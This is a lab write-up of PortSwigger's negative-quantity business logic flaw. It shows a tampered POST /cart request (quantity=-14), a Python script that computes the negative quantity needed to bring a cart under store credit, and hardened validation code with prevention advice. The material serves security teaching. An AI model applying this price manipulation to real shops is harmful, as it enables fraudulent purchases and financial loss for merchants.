Introduction

Business logic vulnerabilities arise when an application makes flawed assumptions about how users will interact with it, so that a sequence of individually legitimate actions produces a result the designers never intended. Unlike technical vulnerabilities such as SQL injection or XSS, they exploit weaknesses in the application's intended workflow and rules rather than in its handling of malformed input.

This write-up covers the PortSwigger Web Security Academy lab titled "High-level logic vulnerability." The lab demonstrates how improper handling of order quantities can allow an attacker to manipulate the purchasing process and obtain products for unintended prices.

Objective of the Lab

The goal of the lab is to purchase the Lightweight L33t Leather Jacket despite having insufficient funds in the account balance.

The vulnerability exists because the application does not reject negative quantity values submitted during the ordering process; it applies them to the cart exactly as it would a positive quantity.

Understanding the Vulnerability

In a secure shopping application, product quantities should only accept positive values.

For example:

  • Quantity = 1 → valid
  • Quantity = 5 → valid
  • Quantity = -1 → invalid

However, in this lab the application accepts negative quantities and feeds them straight into the cart total, which is simply the sum of price × quantity across every line in the cart.

By abusing this behavior, an attacker can subtract an arbitrary amount from the cart total and pay far less than the listed price.

Tools Used

  • Burp Suite Community Edition
  • Browser with Burp Proxy enabled
  • PortSwigger Web Security Academy Lab

Steps to Exploit the Vulnerability

1. Add the Jacket to the Cart

First, add the Lightweight L33t Leather Jacket to the shopping cart.

The jacket costs more than the available account balance, so purchasing it normally is impossible.


2. Add Another Cheap Item

Next, add a second, cheaper item to the cart.

For example:

  • A product costing less than the jacket
  • Quantity left at a normal positive value when first added

This item's quantity is what will later be tampered with to pull the total down. Its price matters, because the amount subtracted is price × quantity, so pick it with the target total in mind.


I decided to add one item priced at $96.94, since my store credit is $100.00.


3. Intercept the Cart Request

Using Burp Suite, intercept the request that updates cart quantities (the POST /cart request sent when an item is added).

The request appears similar to this:

POST /cart HTTP/2
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded

productId=2&quantity=1&redir=CART

4. Change the Quantity to a Negative Number

Modify the quantity parameter from:

quantity=1

to a negative value such as:

quantity=-14

Forward the modified request to the server (or send it from Repeater).


Once I added the -14 and hit Send in Repeater, I went back to the cart and refreshed it, and this is what I saw:


5. Observe the Cart Total

After updating the cart:

  • Each line is price × quantity, so a negative quantity subtracts money from the total instead of adding it
  • The total can be driven as low as you like, including below zero
  • Once the total is positive but within the available store credit, the jacket can be paid for

Aim for that positive, within-credit total rather than the most negative number possible: overshooting below zero buys nothing extra and gives the checkout an easy reason to refuse the order. Then proceed to checkout and place the order.


The lab is solved once the jacket is purchased.
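The whole procedure, as an added example (not code from the write-up or from PortSwigger): a Python model of the lab's cart that accepts any integer quantity, a function that derives the negative quantity from the prices, and the tampered POST /cart body. The $100.00 credit and the $96.94 item come from the write-up; the jacket price of $1337.00, the product IDs and the class and function names are assumptions made for this example.

```python
# Added example, not code from the original write-up or from PortSwigger:
# a model of the lab's cart behaviour plus the arithmetic for picking the
# negative quantity. The store credit (100.00) and the second item's price
# (96.94) come from the write-up; the jacket price (1337.00) and the product
# IDs are assumptions made for this example.
import math
from urllib.parse import urlencode

CREDIT = 100.00                         # store credit stated in the write-up
JACKET_PRICE = 1337.00                  # assumed, not stated on the page
CHEAP_PRICE = 96.94                     # second item's price from the write-up
CATALOGUE = {1: JACKET_PRICE, 2: CHEAP_PRICE}   # constructed productId -> price


class VulnerableCart:
    """Mimics the flawed server: any integer quantity is accepted as-is."""

    def __init__(self):
        self.lines = {}                 # productId -> quantity

    def post_cart(self, product_id, quantity):
        # The flaw: no check that quantity > 0, and no check that the
        # resulting line quantity stays at or above zero.
        self.lines[product_id] = self.lines.get(product_id, 0) + int(quantity)

    def total(self):
        # Each line is price * quantity, so a negative quantity subtracts.
        return round(sum(CATALOGUE[p] * q for p, q in self.lines.items()), 2)


def cart_request_body(product_id, quantity):
    """Form body of the POST /cart request shown above, with the tampered value."""
    return urlencode({"productId": product_id, "quantity": quantity, "redir": "CART"})


def choose_negative_quantity(expensive, cheap, credit):
    """Smallest-magnitude negative quantity q of the cheap item such that
    expensive + q * cheap lands in (0, credit]."""
    if expensive <= credit:
        return 0                        # already affordable, nothing to subtract
    # expensive + q*cheap <= credit  <=>  -q >= (expensive - credit) / cheap
    q = -math.ceil((expensive - credit) / cheap)
    remaining = expensive + q * cheap
    if remaining <= 0:
        # Only possible when the 'cheap' item costs more than the credit itself.
        raise ValueError("total would be <= 0; choose a cheaper second item")
    return q


def exploit():
    """Walk the attack through the model and return (quantity, body, total)."""
    cart = VulnerableCart()
    cart.post_cart(1, 1)                # step 1: add the jacket
    q = choose_negative_quantity(JACKET_PRICE, CHEAP_PRICE, CREDIT)
    body = cart_request_body(2, q)      # steps 3-4: the body as sent to the server
    cart.post_cart(2, q)                # the server applies the negative quantity
    return q, body, cart.total()


if __name__ == "__main__":
    q, body, total = exploit()
    print(f"tampered body: {body}")
    print(f"cart total: ${total:.2f} (credit ${CREDIT:.2f}, "
          f"affordable: {0 < total <= CREDIT})")
```

With these figures the smallest negative quantity that gets under the credit is -13, leaving a total of $76.78; any larger magnitude keeps lowering the total, so compare the cart total against the credit before checking out. Against the real lab the same body is what goes into the intercepted request; the model only stands in for the server so the arithmetic can be run offline.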

Why the Vulnerability Exists

The vulnerability exists because the application does not enforce its own business rules about product quantities on the server.

The quantity is a client-controlled parameter, and the server trusts it both as the number of units in the cart and as the multiplier in the price calculation, without checking that a negative number makes any sense in the purchasing workflow.

This allows attackers to manipulate the calculation and bypass the financial restriction that the store credit is supposed to impose.

Impact of the Vulnerability

If exploited in a real-world application, this vulnerability could result in:

  • Financial losses
  • Fraudulent purchases
  • Inventory abuse
  • Revenue manipulation
  • Broken payment systems

Business logic flaws are especially dangerous because every request in the attack is well-formed and carries no malicious payload, so signature-based defenses such as a WAF or input sanitization have nothing to match on; only the application's own rules can catch them.

How to Prevent This Vulnerability

Developers can prevent this issue by implementing strict server-side validation.

Validate Input Properly

Applications should reject:

  • Negative quantities
  • Extremely large values
  • Non-integer or otherwise malformed numeric input

Enforce Business Rules on the Server

The server should ensure that:

  • Quantities remain within acceptable ranges
  • Cart totals cannot become negative
  • Pricing logic cannot be manipulated by users

Use Secure Calculation Logic

Prices must come from the server-side catalogue and line totals must be computed there; the only client-supplied values, the product ID and the quantity, have to be validated before they enter that calculation.
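One way to implement these checks, as an added example that is not the lab's or PortSwigger's code: the same productId and quantity parameters run through a hardened cart that rejects anything but a bounded positive integer, keeps removal separate from addition, and confirms at checkout that the total is positive and covered by the credit. The catalogue, the $1337.00 jacket price, the per-line limit of 99 and the names used are assumptions for the example; $96.94 and the $100.00 credit are the write-up's figures.

```python
# Added example, not the lab's or PortSwigger's code: the server-side checks
# the prevention advice above calls for, applied to the same productId and
# quantity parameters. The catalogue, the jacket price (1337.00) and the
# per-line limit are assumptions made for this example; 96.94 and the
# 100.00 credit are the figures from the write-up.
import re

MAX_QTY_PER_LINE = 99                         # assumed business limit
CATALOGUE = {1: 1337.00, 2: 96.94}            # authoritative prices live server-side

# ASCII digits only, no sign, no whitespace, bounded length so int() never
# has to parse an absurdly long string.
_POSITIVE_INT = re.compile(r"[0-9]{1,3}")


class InvalidQuantity(ValueError):
    pass


class InsufficientFunds(ValueError):
    pass


def parse_quantity(raw):
    """Turn the raw form value into a bounded positive integer or refuse it.

    A regex on ASCII digits is used instead of int() or str.isdigit(): int()
    happily accepts '-14', ' 3', '+2' and non-ASCII digits, and isdigit() is
    true for characters such as '²' that int() then rejects with a different
    error. One rule, applied before any arithmetic, keeps the behaviour simple.
    """
    if not isinstance(raw, str) or not _POSITIVE_INT.fullmatch(raw):
        raise InvalidQuantity(f"quantity must be a positive integer, got {raw!r}")
    qty = int(raw)
    if not 1 <= qty <= MAX_QTY_PER_LINE:
        raise InvalidQuantity(f"quantity {qty} outside 1..{MAX_QTY_PER_LINE}")
    return qty


class HardenedCart:
    """Lines only grow through add() and shrink through remove(); neither
    path can take a line below zero, so the total can never go negative."""

    def __init__(self):
        self.lines = {}                       # productId -> quantity

    def add(self, product_id, raw_quantity):
        if product_id not in CATALOGUE:
            raise KeyError(f"unknown productId {product_id!r}")
        qty = parse_quantity(raw_quantity)
        new_qty = self.lines.get(product_id, 0) + qty
        if new_qty > MAX_QTY_PER_LINE:
            raise InvalidQuantity(f"line would exceed {MAX_QTY_PER_LINE} units")
        self.lines[product_id] = new_qty

    def remove(self, product_id, raw_quantity):
        # Removal is an explicit action, never a negative add, and it is
        # bounded by what the cart actually holds.
        qty = parse_quantity(raw_quantity)
        current = self.lines.get(product_id, 0)
        if qty > current:
            raise InvalidQuantity(f"only {current} of product {product_id} in cart")
        if qty == current:
            del self.lines[product_id]
        else:
            self.lines[product_id] = current - qty

    def total(self):
        return round(sum(CATALOGUE[p] * q for p, q in self.lines.items()), 2)

    def checkout(self, credit):
        total = self.total()
        if total <= 0:
            # Covers an empty cart and acts as defence in depth: the checks
            # above already make a negative line impossible.
            raise ValueError("cart total must be positive")
        if total > credit:
            raise InsufficientFunds(f"total {total:.2f} exceeds credit {credit:.2f}")
        return total


def demo():
    """Replay the tampered request from the write-up against the hardened cart."""
    cart = HardenedCart()
    cart.add(1, "1")                          # the jacket
    rejected = []
    for raw in ("-14", "0", "1.5", " 3", "²", "100"):
        try:
            cart.add(2, raw)
        except InvalidQuantity:
            rejected.append(raw)
    cart.add(2, "2")
    cart.remove(2, "2")                       # explicit removal, bounded by contents
    try:
        cart.checkout(100.00)
        affordable = True
    except InsufficientFunds:
        affordable = False
    return {"rejected": rejected, "lines": dict(cart.lines),
            "total": cart.total(), "affordable": affordable}


if __name__ == "__main__":
    print(demo())
```

The point of the design is that a negative number never acquires a meaning: there is no code path in which "-14" is interpreted as "remove 14", so there is nothing for the attacker to invert. Removal exists, but as its own action whose argument goes through the same validator and is capped by the current line quantity.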

Conclusion

This lab demonstrates how small logical mistakes in application workflows can lead to serious security issues. By manipulating quantity values, an attacker can abuse the application's pricing system and purchase expensive products at unintended prices.

The exercise highlights an important lesson in application security:

Applications must validate not only technical input, but also logical business behavior.

Proper server-side validation and strict enforcement of business rules are essential to preventing business logic vulnerabilities.